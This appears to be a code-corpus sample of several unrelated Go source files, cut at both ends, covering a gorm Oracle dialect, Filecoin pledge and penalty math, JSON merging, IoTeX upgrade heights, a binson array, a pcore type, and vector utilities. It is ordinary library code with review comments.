"crypto/sha1"
"fmt"
"reflect"
"regexp"
"strconv"
"strings"
"time"
"unicode/utf8"
)
// oracle implements the gorm dialect interface for Oracle via the oci8 driver.
type oracle struct {
	commonDialect
}

func init() {
	// Register under the oci8 driver name so opening a DB with "oci8" finds
	// this dialect.
	RegisterDialect("oci8", &oracle{})
}

// GetName returns the dialect's registered name.
func (oracle) GetName() string {
	return "oci8"
}

// Quote wraps an identifier in double quotes, upper-cased to match
// Oracle's default folding of unquoted identifiers.
func (oracle) Quote(key string) string {
	return fmt.Sprintf("\"%s\"", strings.ToUpper(key))
}

// SelectFromDummyTable returns the clause required for table-less SELECTs.
func (oracle) SelectFromDummyTable() string {
	return "FROM dual"
}

// BindVar renders the i-th positional bind variable (Oracle uses :1, :2, ...).
func (oracle) BindVar(i int) string {
	return fmt.Sprintf(":%d", i)
}

// DataTypeOf maps a gorm struct field to an Oracle column type, honoring
// explicit type/size tags parsed by ParseFieldStructForDialect. It panics
// for Go kinds it cannot map, matching gorm's other dialects.
func (s *oracle) DataTypeOf(field *StructField) string {
	var dataValue, sqlType, size, additionalType = ParseFieldStructForDialect(field, s)
	if sqlType == "" {
		switch dataValue.Kind() {
		case reflect.Bool:
			sqlType = "CHAR(1)"
		case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uintptr:
			sqlType = "INTEGER"
		case reflect.Int64, reflect.Uint64:
			sqlType = "NUMBER"
		case reflect.Float32, reflect.Float64:
			sqlType = "FLOAT"
		case reflect.String:
			if size > 0 && size < 255 {
				sqlType = fmt.Sprintf("VARCHAR(%d)", size)
			} else {
				sqlType = "VARCHAR(255)"
			}
		case reflect.Struct:
			if _, ok := dataValue.Interface().(time.Time); ok {
				sqlType = "TIMESTAMP"
			}
		}
	}
	if sqlType == "" {
		panic(fmt.Sprintf("invalid sql type %s (%s) for oci8", dataValue.Type().Name(), dataValue.Kind().String()))
	}
	if strings.TrimSpace(additionalType) == "" {
		return sqlType
	}
	return fmt.Sprintf("%v %v", sqlType, additionalType)
}

// HasIndex reports whether the named index exists on the table.
// NOTE(review): the Scan error is ignored here and in the other Has*
// helpers; on query failure count stays 0 and the answer is false. This
// matches the pattern of gorm's common dialect.
func (s oracle) HasIndex(tableName string, indexName string) bool {
	var count int
	s.db.QueryRow("SELECT COUNT(*) FROM USER_INDEXES WHERE TABLE_NAME = :1 AND INDEX_NAME = :2", strings.ToUpper(tableName), strings.ToUpper(indexName)).Scan(&count)
	return count > 0
}

// HasForeignKey reports whether the named referential constraint exists on the table.
func (s oracle) HasForeignKey(tableName string, foreignKeyName string) bool {
	var count int
	s.db.QueryRow("SELECT COUNT(*) FROM USER_CONSTRAINTS WHERE CONSTRAINT_TYPE = 'R' AND TABLE_NAME = :1 AND CONSTRAINT_NAME = :2", strings.ToUpper(tableName), strings.ToUpper(foreignKeyName)).Scan(&count)
	return count > 0
}

// HasTable reports whether the named table exists in the current schema.
func (s oracle) HasTable(tableName string) bool {
	var count int
	s.db.QueryRow("SELECT COUNT(*) FROM USER_TABLES WHERE TABLE_NAME = :1", strings.ToUpper(tableName)).Scan(&count)
	return count > 0
}

// HasColumn reports whether the named column exists on the table.
func (s oracle) HasColumn(tableName string, columnName string) bool {
	var count int
	s.db.QueryRow("SELECT COUNT(*) FROM USER_TAB_COLUMNS WHERE TABLE_NAME = :1 AND COLUMN_NAME = :2", strings.ToUpper(tableName), strings.ToUpper(columnName)).Scan(&count)
	return count > 0
}
// LimitAndOffsetSQL builds the limit clause for Oracle queries.
//
// Oracle (pre-12c) has no LIMIT keyword, so a non-negative limit is
// rendered as a "ROWNUM <= n" condition. The offset argument is accepted
// for dialect-interface compatibility but is not supported and is ignored.
//
// The original shadowed err in the if-initializer and then tested the
// always-nil named return, making that error branch dead; it also formatted
// the raw interface{} value with %d, which produced "%!d(string=...)"
// output when the limit arrived as a string. This version formats the
// parsed value. A value that fails to parse is skipped silently, matching
// the original's effective behavior.
func (oracle) LimitAndOffsetSQL(limit, offset interface{}) (sql string, err error) {
	if limit != nil {
		if parsedLimit, e := strconv.ParseInt(fmt.Sprint(limit), 0, 0); e == nil && parsedLimit >= 0 {
			sql = fmt.Sprintf("ROWNUM <= %d", parsedLimit)
		}
	}
	return sql, nil
}
// BuildKeyName generates a constraint/index name, shortening it to fit
// Oracle's 30-character identifier limit. When the default name is too
// long, the SHA-1 of the full name is appended to a sanitized form of the
// first field name (sha1 is used only for uniqueness here, not security).
func (s oracle) BuildKeyName(kind, tableName string, fields ...string) string {
	keyName := s.commonDialect.BuildKeyName(kind, tableName, fields...)
	if utf8.RuneCountInString(keyName) <= 30 {
		return keyName
	}
	h := sha1.New()
	h.Write([]byte(keyName))
	bs := h.Sum(nil)
	// sha1 is 40 digits, keep first 24 characters of destination
	destRunes := []rune(regexp.MustCompile("(_*[^a-zA-Z]+_*|_+)").ReplaceAllString(fields[0], "_"))
	result := fmt.Sprintf("%s%x", string(destRunes), bs)
	if len(result) <= 30 {
		return result
	}
	// NOTE(review): truncates to 29 bytes rather than 30 — presumably
	// conservative; confirm before relying on the full limit.
	return result[:29]
} | dialects_oracle_oci8.go | 0.540924 | 0.412057 | dialects_oracle_oci8.go | starcoder
package miner
import (
"github.com/filecoin-project/specs-actors/actors/abi"
"github.com/filecoin-project/specs-actors/actors/abi/big"
"github.com/filecoin-project/specs-actors/actors/builtin"
"github.com/filecoin-project/specs-actors/actors/util/math"
"github.com/filecoin-project/specs-actors/actors/util/smoothing"
)
// IP = IPBase(precommit time) + AdditionalIP(precommit time)
// IPBase(t) = BR(t, InitialPledgeProjectionPeriod)
// AdditionalIP(t) = LockTarget(t)*PledgeShare(t)
// LockTarget = (LockTargetFactorNum / LockTargetFactorDenom) * FILCirculatingSupply(t)
// PledgeShare(t) = sectorQAPower / max(BaselinePower(t), NetworkQAPower(t))
// PARAM_FINISH
var PreCommitDepositFactor = 20
var InitialPledgeFactor = 20
var PreCommitDepositProjectionPeriod = abi.ChainEpoch(PreCommitDepositFactor) * builtin.EpochsInDay
var InitialPledgeProjectionPeriod = abi.ChainEpoch(InitialPledgeFactor) * builtin.EpochsInDay
var LockTargetFactorNum = big.NewInt(3)
var LockTargetFactorDenom = big.NewInt(10)

// FF = BR(t, DeclaredFaultProjectionPeriod)
// projection period of 2.14 days: 2880 * 2.14 = 6163.2. Rounded to nearest epoch 6163
var DeclaredFaultFactorNum = 214
var DeclaredFaultFactorDenom = 100
var DeclaredFaultProjectionPeriod = abi.ChainEpoch((builtin.EpochsInDay * DeclaredFaultFactorNum) / DeclaredFaultFactorDenom)

// SP = BR(t, UndeclaredFaultProjectionPeriod)
var UndeclaredFaultProjectionPeriod = abi.ChainEpoch(5) * builtin.EpochsInDay

// Maximum number of days of BR a terminated sector can be penalized
const TerminationLifetimeCap = abi.ChainEpoch(70)

// This is the BR(t) value of the given sector for the current epoch.
// It is the expected reward this sector would pay out over a one day period.
// BR(t) = CurrEpochReward(t) * SectorQualityAdjustedPower * EpochsInDay / TotalNetworkQualityAdjustedPower(t)
// A zero smoothed network power falls back to the raw reward estimate to
// avoid dividing by zero. The intermediate product is in Q.128 fixed point
// and is shifted back down before returning.
func ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower, projectionDuration abi.ChainEpoch) abi.TokenAmount {
	networkQAPowerSmoothed := networkQAPowerEstimate.Estimate()
	if networkQAPowerSmoothed.IsZero() {
		return rewardEstimate.Estimate()
	}
	expectedRewardForProvingPeriod := smoothing.ExtrapolatedCumSumOfRatio(projectionDuration, 0, rewardEstimate, networkQAPowerEstimate)
	br := big.Mul(qaSectorPower, expectedRewardForProvingPeriod) // Q.0 * Q.128 => Q.128
	return big.Rsh(br, math.Precision)
}

// This is the FF(t) penalty for a sector expected to be in the fault state either because the fault was declared or because
// it has been previously detected by the network.
// FF(t) = DeclaredFaultFactor * BR(t)
func PledgePenaltyForDeclaredFault(rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower) abi.TokenAmount {
	return ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate, qaSectorPower, DeclaredFaultProjectionPeriod)
}

// This is the SP(t) penalty for a newly faulty sector that has not been declared.
// SP(t) = UndeclaredFaultFactor * BR(t)
func PledgePenaltyForUndeclaredFault(rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower) abi.TokenAmount {
	return ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate, qaSectorPower, UndeclaredFaultProjectionPeriod)
}

// Penalty to locked pledge collateral for the termination of a sector before scheduled expiry.
// SectorAge is the time between the sector's activation and termination.
// The age-based component is capped at TerminationLifetimeCap days of
// rewards; minEpoch is a package-level helper defined elsewhere in this
// package.
func PledgePenaltyForTermination(dayRewardAtActivation, twentyDayRewardAtActivation abi.TokenAmount, sectorAge abi.ChainEpoch, rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower) abi.TokenAmount {
	// max(SP(t), BR(StartEpoch, 20d) + BR(StartEpoch, 1d)*min(SectorAgeInDays, 70))
	// and sectorAgeInDays = sectorAge / EpochsInDay
	cappedSectorAge := big.NewInt(int64(minEpoch(sectorAge, TerminationLifetimeCap*builtin.EpochsInDay)))
	return big.Max(
		PledgePenaltyForUndeclaredFault(rewardEstimate, networkQAPowerEstimate, qaSectorPower),
		big.Add(
			twentyDayRewardAtActivation,
			big.Div(
				big.Mul(dayRewardAtActivation, cappedSectorAge),
				big.NewInt(builtin.EpochsInDay))))
}

// Computes the PreCommit Deposit given sector qa weight and current network conditions.
// PreCommit Deposit = 20 * BR(t)
func PreCommitDepositForPower(rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, qaSectorPower abi.StoragePower) abi.TokenAmount {
	return ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate, qaSectorPower, PreCommitDepositProjectionPeriod)
}

// Computes the pledge requirement for committing new quality-adjusted power to the network, given the current
// total power, total pledge commitment, epoch block reward, and circulating token supply.
// In plain language, the pledge requirement is a multiple of the block reward expected to be earned by the
// newly-committed power, holding the per-epoch block reward constant (though in reality it will change over time).
// The pledge-share denominator uses qaPower as a floor so a zero network
// power or baseline cannot cause a division by zero.
func InitialPledgeForPower(qaPower abi.StoragePower, baselinePower abi.StoragePower, networkTotalPledge abi.TokenAmount, rewardEstimate, networkQAPowerEstimate *smoothing.FilterEstimate, networkCirculatingSupplySmoothed abi.TokenAmount) abi.TokenAmount {
	networkQAPower := networkQAPowerEstimate.Estimate()
	ipBase := ExpectedRewardForPower(rewardEstimate, networkQAPowerEstimate, qaPower, InitialPledgeProjectionPeriod)
	lockTargetNum := big.Mul(LockTargetFactorNum, networkCirculatingSupplySmoothed)
	lockTargetDenom := LockTargetFactorDenom
	pledgeShareNum := qaPower
	pledgeShareDenom := big.Max(big.Max(networkQAPower, baselinePower), qaPower) // use qaPower in case others are 0
	additionalIPNum := big.Mul(lockTargetNum, pledgeShareNum)
	additionalIPDenom := big.Mul(lockTargetDenom, pledgeShareDenom)
	additionalIP := big.Div(additionalIPNum, additionalIPDenom)
	return big.Add(ipBase, additionalIP)
} | actors/builtin/miner/monies.go | 0.637144 | 0.412619 | monies.go | starcoder
package merge
// Interface describes a merger of two decoded JSON values.
type Interface interface {
	// Merge combines src into dst, returning the merged value and whether
	// the result differs from dst alone.
	Merge(dst interface{}, src interface{}) (interface{}, bool)
}

// detectType classifies decoded JSON values for merge dispatch.
type detectType uint

const (
	// noneType marks scalars (numbers, strings, booleans, nil).
	noneType detectType = iota
	// mapType marks JSON objects (map[string]interface{}).
	mapType
	// arrayType marks JSON arrays ([]interface{}).
	arrayType
)

// JSONMerge is the default, stateless Interface implementation.
type JSONMerge struct{}

// NewJSONMerge returns a ready-to-use JSONMerge.
func NewJSONMerge() Interface {
	return &JSONMerge{}
}
// Merge combines src into dst and reports whether the result differs from
// a plain dst. A nil src leaves dst untouched; a nil dst is replaced by
// src. Two maps or two arrays are merged recursively/elementwise; any
// other combination yields src with a false "merged" flag.
func (m *JSONMerge) Merge(dst interface{}, src interface{}) (interface{}, bool) {
	if src == nil {
		return dst, false
	}
	if dst == nil {
		return src, true
	}
	return m.processing(dst, src)
}

// processing dispatches on the JSON container kinds of both operands. Only
// matching container kinds are merged; everything else is replaced by src.
func (m *JSONMerge) processing(dst interface{}, src interface{}) (interface{}, bool) {
	dstKind := m.typeDetect(dst)
	srcKind := m.typeDetect(src)
	if dstKind != srcKind {
		return src, false
	}
	switch srcKind {
	case arrayType:
		left, _ := dst.([]interface{})
		right, _ := src.([]interface{})
		return m.mergeARRAY(left, right), true
	case mapType:
		left, _ := dst.(map[string]interface{})
		right, _ := src.(map[string]interface{})
		return m.mergeMAP(left, right), true
	default:
		// Two scalars: src wins, but this does not count as a merge.
		return src, false
	}
}

// typeDetect classifies a decoded JSON value as array, map, or scalar.
func (m *JSONMerge) typeDetect(input interface{}) detectType {
	switch input.(type) {
	case []interface{}:
		return arrayType
	case map[string]interface{}:
		return mapType
	default:
		return noneType
	}
}

// mergeARRAY overlays src onto dst elementwise: the result has the length
// of the longer slice, starts as a copy of dst, and src's elements then
// overwrite the leading positions.
func (m *JSONMerge) mergeARRAY(dst []interface{}, src []interface{}) []interface{} {
	size := len(dst)
	if len(src) > size {
		size = len(src)
	}
	result := make([]interface{}, size)
	copy(result, dst)
	copy(result, src)
	return result
}
// mergeMAP merges src into dst key by key.
//
// NOTE(review): this mutates dst in place (result aliases dst); callers
// needing the input preserved must copy first. A key missing from dst, or
// present with a scalar value, is overwritten by src's value; container
// values are merged recursively via Merge. A nil dst map is lazily
// allocated on the first write.
func (m *JSONMerge) mergeMAP(dst map[string]interface{}, src map[string]interface{}) map[string]interface{} {
	result := dst
	for i := range src {
		if _, ok := result[i]; !ok || m.typeDetect(result[i]) == noneType {
			if result == nil {
				result = make(map[string]interface{})
			}
			result[i] = src[i]
			continue
		}
		result[i], _ = m.Merge(result[i], src[i])
	}
	return result
} | internal/merge/merge.go | 0.584745 | 0.411998 | merge.go | starcoder
package config
import (
"log"
"github.com/iotexproject/iotex-core/blockchain/genesis"
)
// Codename for height upgrades
const (
	Pacific = iota
	Aleutian
	Bering
	Cook
	Dardanelles
	Daytona
	Easter
	Fairbank
)

type (
	// HeightName is codename for height upgrades
	HeightName int
	// HeightUpgrade lists heights at which certain fixes take effect
	// prior to Dardanelles, each epoch consists of 360 sub-epochs
	// so height = 360k + 1
	// starting Dardanelles, each epoch consists of 720 sub-epochs
	// however, DardanellesHeight is set to 360(2k + 1) + 1 (instead of 720k + 1)
	// so height afterwards must be set to 360(2k + 1) + 1
	HeightUpgrade struct {
		pacificHeight     uint64
		aleutianHeight    uint64
		beringHeight      uint64
		cookHeight        uint64
		dardanellesHeight uint64
		daytonaHeight     uint64
		easterHeight      uint64
		fairbankHeight    uint64
	}
)

// NewHeightUpgrade creates a height upgrade config
// by copying the activation heights out of the supplied genesis config.
// The positional literal below must stay in the same order as the struct
// fields above.
func NewHeightUpgrade(cfg *genesis.Genesis) HeightUpgrade {
	return HeightUpgrade{
		cfg.PacificBlockHeight,
		cfg.AleutianBlockHeight,
		cfg.BeringBlockHeight,
		cfg.CookBlockHeight,
		cfg.DardanellesBlockHeight,
		cfg.DaytonaBlockHeight,
		cfg.EasterBlockHeight,
		cfg.FairbankBlockHeight,
	}
}
// IsPost return true if height is after the height upgrade
// (i.e. at or beyond the upgrade's activation height). An unknown codename
// is a programmer error and panics via the logger.
func (hu *HeightUpgrade) IsPost(name HeightName, height uint64) bool {
	var threshold uint64
	switch name {
	case Pacific:
		threshold = hu.pacificHeight
	case Aleutian:
		threshold = hu.aleutianHeight
	case Bering:
		threshold = hu.beringHeight
	case Cook:
		threshold = hu.cookHeight
	case Dardanelles:
		threshold = hu.dardanellesHeight
	case Daytona:
		threshold = hu.daytonaHeight
	case Easter:
		threshold = hu.easterHeight
	case Fairbank:
		threshold = hu.fairbankHeight
	default:
		log.Panic("invalid height name!")
	}
	return height >= threshold
}

// IsPre return true if height is before the height upgrade
func (hu *HeightUpgrade) IsPre(name HeightName, height uint64) bool {
	return !hu.IsPost(name, height)
}
// Accessors for the configured upgrade activation heights.

// PacificBlockHeight returns the pacific height
func (hu *HeightUpgrade) PacificBlockHeight() uint64 { return hu.pacificHeight }

// AleutianBlockHeight returns the aleutian height
func (hu *HeightUpgrade) AleutianBlockHeight() uint64 { return hu.aleutianHeight }

// BeringBlockHeight returns the bering height
func (hu *HeightUpgrade) BeringBlockHeight() uint64 { return hu.beringHeight }

// CookBlockHeight returns the cook height
func (hu *HeightUpgrade) CookBlockHeight() uint64 { return hu.cookHeight }

// DardanellesBlockHeight returns the dardanelles height
func (hu *HeightUpgrade) DardanellesBlockHeight() uint64 { return hu.dardanellesHeight }

// DaytonaBlockHeight returns the daytona height
func (hu *HeightUpgrade) DaytonaBlockHeight() uint64 { return hu.daytonaHeight }

// EasterBlockHeight returns the easter height
func (hu *HeightUpgrade) EasterBlockHeight() uint64 { return hu.easterHeight }

// FairbankBlockHeight returns the fairbank height
func (hu *HeightUpgrade) FairbankBlockHeight() uint64 { return hu.fairbankHeight } | config/heightupgrade.go | 0.678859 | 0.405566 | heightupgrade.go | starcoder
package binson
import (
"fmt"
)
// Returns a new empty binson array.
func NewBinsonArray() *BinsonArray {
	a := BinsonArray([]field{})
	return &a
}

// Return length of binson array.
func (a *BinsonArray) Size() int{
	return len(*a);
}

// Removes a given field if it exists.
// NOTE(review): there is no bounds check — an out-of-range index panics
// rather than being ignored; confirm whether "if it exists" is meant
// literally.
func (a *BinsonArray) Remove(index int){
	*a = append( (*a)[:index], (*a)[index+1:]...)
}

// inRange reports whether index is OUTSIDE the array bounds (true means
// invalid). The name is inverted relative to its meaning; it is kept
// as-is because every Has* accessor below depends on this polarity.
func (a *BinsonArray) inRange(index int) bool{
	return index < 0 || a.Size() <= index
}

// HasArray reports whether the element at index exists and is an array.
func (a *BinsonArray) HasArray(index int) bool {
	if a.inRange(index){
		return false
	}
	_, ok := (*a)[index].(*BinsonArray)
	return ok
}

// GetArray returns the element at index as an array.
// NOTE(review): the Get* accessors, unlike Has*, perform no bounds check;
// an out-of-range index panics.
func (a *BinsonArray) GetArray(index int) (*BinsonArray, bool) {
	obj, ok := (*a)[index].(*BinsonArray)
	return obj, ok
}

// HasBinson reports whether the element at index exists and is a binson object.
func (a *BinsonArray) HasBinson(index int) bool {
	if a.inRange(index){
		return false
	}
	_, ok := (*a)[index].(Binson)
	return ok
}

// GetBinson returns the element at index as a binson object (no bounds check).
func (a *BinsonArray) GetBinson(index int) (Binson, bool) {
	obj, ok := (*a)[index].(Binson)
	return obj, ok
}

// HasInt reports whether the element at index exists and is an integer.
func (a *BinsonArray) HasInt(index int) bool {
	if a.inRange(index){
		return false
	}
	_, ok := (*a)[index].(binsonInt)
	return ok
}

// GetInt returns the element at index as an int64 (no bounds check).
func (a *BinsonArray) GetInt(index int) (int64, bool) {
	obj, ok := (*a)[index].(binsonInt)
	return int64(obj), ok
}

// HasString reports whether the element at index exists and is a string.
func (a *BinsonArray) HasString(index int) bool {
	if a.inRange(index){
		return false
	}
	_, ok := (*a)[index].(binsonString)
	return ok
}

// GetString returns the element at index as a string (no bounds check).
func (a *BinsonArray) GetString(index int) (string, bool) {
	obj, ok := (*a)[index].(binsonString)
	return string(obj), ok
}

// HasBytes reports whether the element at index exists and is a byte slice.
func (a *BinsonArray) HasBytes(index int) bool {
	if a.inRange(index){
		return false
	}
	_, ok := (*a)[index].(binsonBytes)
	return ok
}

// GetBytes returns the element at index as a []byte (no bounds check).
func (a *BinsonArray) GetBytes(index int) ([]byte, bool) {
	obj, ok := (*a)[index].(binsonBytes)
	return []byte(obj), ok
}

// HasBool reports whether the element at index exists and is a boolean.
func (a *BinsonArray) HasBool(index int) bool {
	if a.inRange(index){
		return false
	}
	_, ok := (*a)[index].(binsonBool)
	return ok
}

// GetBool returns the element at index as a bool (no bounds check).
func (a *BinsonArray) GetBool(index int) (bool, bool) {
	obj, ok := (*a)[index].(binsonBool)
	return bool(obj), ok
}

// HasFloat reports whether the element at index exists and is a float.
func (a *BinsonArray) HasFloat(index int) bool {
	if a.inRange(index){
		return false
	}
	_, ok := (*a)[index].(binsonFloat)
	return ok
}

// GetFloat returns the element at index as a float64 (no bounds check).
func (a *BinsonArray) GetFloat(index int) (float64, bool) {
	obj, ok := (*a)[index].(binsonFloat)
	return float64(obj), ok
}

// addField appends a raw field and returns the array for chaining.
func (a *BinsonArray) addField(value field) *BinsonArray {
	*a = append(*a, value)
	return a
}

// Adds an element to the array.
// Supported element types: Binson, *BinsonArray, int, int64, string,
// []byte, bool and float64; anything else panics.
func (a *BinsonArray) Put(value interface{}) (*BinsonArray){
	switch o := value.(type) {
	case Binson:
		a.addField(o)
	case *BinsonArray:
		a.addField(o)
	case int:
		a.addField(binsonInt(int64(o)))
	case int64:
		a.addField(binsonInt(o))
	case string:
		a.addField(binsonString(o))
	case []byte:
		a.addField(binsonBytes(o))
	case bool:
		a.addField(binsonBool(o))
	case float64:
		a.addField(binsonFloat(o))
	default:
		panic(fmt.Sprintf("%T is not handeled by Binson", o))
	}
	return a
} | binson_array.go | 0.669637 | 0.442576 | binson_array.go | starcoder
package types
import (
"io"
"reflect"
"github.com/lyraproj/pcore/px"
)
// NotUndefType matches any value of its contained type except undef.
type NotUndefType struct {
	typ px.Type
}

// NotUndefMetaType is the Pcore runtime type describing NotUndefType itself.
var NotUndefMetaType px.ObjectType

func init() {
	// Register NotUndefType's metadata and its constructor with the Pcore
	// type system.
	NotUndefMetaType = newObjectType(`Pcore::NotUndefType`,
		`Pcore::AnyType {
	attributes => {
		type => {
			type => Optional[Type],
			value => Any
		},
	}
}`, func(ctx px.Context, args []px.Value) px.Value {
			return newNotUndefType2(args...)
		})
}

// DefaultNotUndefType returns the default (unparameterized) NotUndef type.
func DefaultNotUndefType() *NotUndefType {
	return notUndefTypeDefault
}

// NewNotUndefType returns a NotUndef type constrained to containedType.
// A nil or Any contained type yields the shared default instance.
func NewNotUndefType(containedType px.Type) *NotUndefType {
	if containedType == nil || containedType == anyTypeDefault {
		return DefaultNotUndefType()
	}
	return &NotUndefType{containedType}
}

// newNotUndefType2 builds a NotUndefType from constructor arguments: zero
// arguments yield the default, a single Type or String parameterizes the
// result, anything else panics with an argument error.
func newNotUndefType2(args ...px.Value) *NotUndefType {
	switch len(args) {
	case 0:
		return DefaultNotUndefType()
	case 1:
		if containedType, ok := args[0].(px.Type); ok {
			return NewNotUndefType(containedType)
		}
		if containedType, ok := args[0].(stringValue); ok {
			return newNotUndefType3(string(containedType))
		}
		panic(illegalArgumentType(`NotUndef[]`, 0, `Variant[Type,String]`, args[0]))
	default:
		panic(illegalArgumentCount(`NotUndef[]`, `0 - 1`, len(args)))
	}
}

// newNotUndefType3 builds a NotUndefType whose contained type matches the exact string str.
func newNotUndefType3(str string) *NotUndefType {
	return &NotUndefType{NewStringType(nil, str)}
}

// Accept visits this type and then its contained type.
func (t *NotUndefType) Accept(v px.Visitor, g px.Guard) {
	v(t)
	t.typ.Accept(v, g)
}

// ContainedType returns the type that values must additionally conform to.
func (t *NotUndefType) ContainedType() px.Type {
	return t.typ
}

// Default returns the unparameterized NotUndef type.
func (t *NotUndefType) Default() px.Type {
	return notUndefTypeDefault
}

// Equals reports whether o is a NotUndefType with an equal contained type.
func (t *NotUndefType) Equals(o interface{}, g px.Guard) bool {
	if ot, ok := o.(*NotUndefType); ok {
		return t.typ.Equals(ot.typ, g)
	}
	return false
}

// Generic returns NotUndef parameterized by the generic form of the contained type.
func (t *NotUndefType) Generic() px.Type {
	return NewNotUndefType(px.GenericType(t.typ))
}

// Get exposes the `type` attribute to the Pcore reflection machinery.
func (t *NotUndefType) Get(key string) (value px.Value, ok bool) {
	switch key {
	case `type`:
		return t.typ, true
	}
	return nil, false
}

// IsAssignable reports whether o is assignable to this type: o must not
// accept undef and must itself be assignable to the contained type.
func (t *NotUndefType) IsAssignable(o px.Type, g px.Guard) bool {
	return !GuardedIsAssignable(o, undefTypeDefault, g) && GuardedIsAssignable(t.typ, o, g)
}

// IsInstance reports whether o is a non-undef instance of the contained type.
func (t *NotUndefType) IsInstance(o px.Value, g px.Guard) bool {
	return o != undef && GuardedIsInstance(t.typ, o, g)
}

// MetaType returns the runtime type describing NotUndefType.
func (t *NotUndefType) MetaType() px.ObjectType {
	return NotUndefMetaType
}

// Name returns the simple type name.
func (t *NotUndefType) Name() string {
	return `NotUndef`
}

// Parameters returns the type parameters used when rendering this type:
// empty for the default, a bare string for an exact-string contained type,
// otherwise the contained type itself.
func (t *NotUndefType) Parameters() []px.Value {
	if t.typ == DefaultAnyType() {
		return px.EmptyValues
	}
	if str, ok := t.typ.(*vcStringType); ok && str.value != `` {
		return []px.Value{stringValue(str.value)}
	}
	return []px.Value{t.typ}
}

// Resolve resolves the contained type in the given context.
// Note that the receiver is mutated in place and then returned.
func (t *NotUndefType) Resolve(c px.Context) px.Type {
	t.typ = resolve(c, t.typ)
	return t
}

// ReflectType returns the Go reflect.Type for the contained type, if any.
func (t *NotUndefType) ReflectType(c px.Context) (reflect.Type, bool) {
	return ReflectType(c, t.typ)
}

// CanSerializeAsString reports whether the contained type can round-trip through a string.
func (t *NotUndefType) CanSerializeAsString() bool {
	return canSerializeAsString(t.typ)
}

// SerializationString returns the string form used for serialization.
func (t *NotUndefType) SerializationString() string {
	return t.String()
}

// String returns the canonical string representation of the type.
func (t *NotUndefType) String() string {
	return px.ToString2(t, None)
}

// ToString writes the type's representation to b using the given format context.
func (t *NotUndefType) ToString(b io.Writer, s px.FormatContext, g px.RDetect) {
	TypeToString(t, b, s, g)
}

// PType returns the type of this type (a TypeType wrapping it).
func (t *NotUndefType) PType() px.Type {
	return &TypeType{t}
}

// notUndefTypeDefault is the shared default instance (NotUndef of Any).
var notUndefTypeDefault = &NotUndefType{typ: anyTypeDefault} | types/notundeftype.go | 0.570092 | 0.423577 | notundeftype.go | starcoder
package vector
import (
"fmt"
"math"
"github.com/downflux/go-geometry/epsilon"
)
type D int
const (
// AXIS_X is a common alias for the first dimension.
AXIS_X D = iota
// AXIS_Y is a common alias for the second dimension.
AXIS_Y
// AXIS_Z is a common alias for the third dimension.
AXIS_Z
// AXIS_W is a common alias for the fourth dimension.
AXIS_W
)
// V is an n-length vector.
type V []float64
func New(xs ...float64) *V {
v := V(xs)
return &v
}
// Dimension returns the dimension (number of components) of the vector.
func (v V) Dimension() D { return D(len(v)) }
// X returns the i-th component of the vector, panicking with a
// descriptive message when i is out of range.
func (v V) X(i D) float64 {
	if i < v.Dimension() {
		return v[i]
	}
	panic(fmt.Sprintf("cannot access %v-dimensional data in a %v dimensional vector", i+1, v.Dimension()))
}
func SquaredMagnitude(v V) float64 { return Dot(v, v) }
func Magnitude(v V) float64 { return math.Sqrt(SquaredMagnitude(v)) }
func Unit(v V) V { return Scale(1/Magnitude(v), v) }
func UnitBuf(v V, b V) { ScaleBuf(1/Magnitude(v), v, b) }
// Dot returns the inner product of v and u. Panics when the vectors have
// different dimensions.
func Dot(v V, u V) float64 {
	if v.Dimension() != u.Dimension() {
		panic("mismatching vector dimensions")
	}
	sum := 0.0
	for i, x := range v {
		sum += x * u[i]
	}
	return sum
}
// Add returns the component-wise sum v + u as a new vector. Panics when
// the dimensions differ.
func Add(v V, u V) V {
	if v.Dimension() != u.Dimension() {
		panic("mismatching vector dimensions")
	}
	out := make(V, v.Dimension())
	AddBuf(v, u, out)
	return out
}
// AddBuf writes the component-wise sum v + u into the buffer b. Panics
// when any of the three dimensions differ.
func AddBuf(v V, u V, b V) {
	if v.Dimension() != u.Dimension() || v.Dimension() != b.Dimension() {
		panic("mismatching vector dimensions")
	}
	for i, x := range v {
		b[i] = x + u[i]
	}
}
// Sub returns the component-wise difference v - u as a new vector. Panics
// when the dimensions differ.
func Sub(v V, u V) V {
	if v.Dimension() != u.Dimension() {
		panic("mismatching vector dimensions")
	}
	out := make(V, v.Dimension())
	SubBuf(v, u, out)
	return out
}
// SubBuf writes the component-wise difference v - u into the buffer b.
// Panics when any of the three dimensions differ.
func SubBuf(v V, u V, b V) {
	if v.Dimension() != u.Dimension() || v.Dimension() != b.Dimension() {
		panic("mismatching vector dimensions")
	}
	for i, x := range v {
		b[i] = x - u[i]
	}
}
// Scale returns a new vector equal to v scaled by the constant c.
func Scale(c float64, v V) V {
	out := make(V, v.Dimension())
	ScaleBuf(c, v, out)
	return out
}
// ScaleBuf writes c * v into the buffer b. Panics when the dimensions of
// v and b differ.
func ScaleBuf(c float64, v V, b V) {
	if v.Dimension() != b.Dimension() {
		panic("mismatching vector dimensions")
	}
	for i, x := range v {
		b[i] = c * x
	}
}
// Within reports whether v and u are component-wise equal to within the
// epsilon tolerance.
//
// Fix: the previous version indexed u by v's dimension without checking
// the lengths, so a shorter u caused an index-out-of-range panic and a
// longer u had its extra components silently ignored (making the result
// asymmetric). A mismatch now panics with the same message as every
// other binary operation in this package.
func Within(v V, u V) bool {
	if v.Dimension() != u.Dimension() {
		panic("mismatching vector dimensions")
	}
	for i := D(0); i < v.Dimension(); i++ {
		if !epsilon.Within(u[i], v[i]) {
			return false
		}
	}
	return true
}
func IsOrthogonal(v V, u V) bool { return Dot(v, u) == 0 } | nd/vector/vector.go | 0.843766 | 0.515071 | vector.go | starcoder |
package egc
// Det2x2 -- computes the determinant of a 2x2 matrix using exact QQ
// arithmetic: a[0][0]*a[1][1] - a[1][0]*a[0][1].
func Det2x2(a [2][2]QQ) QQ {
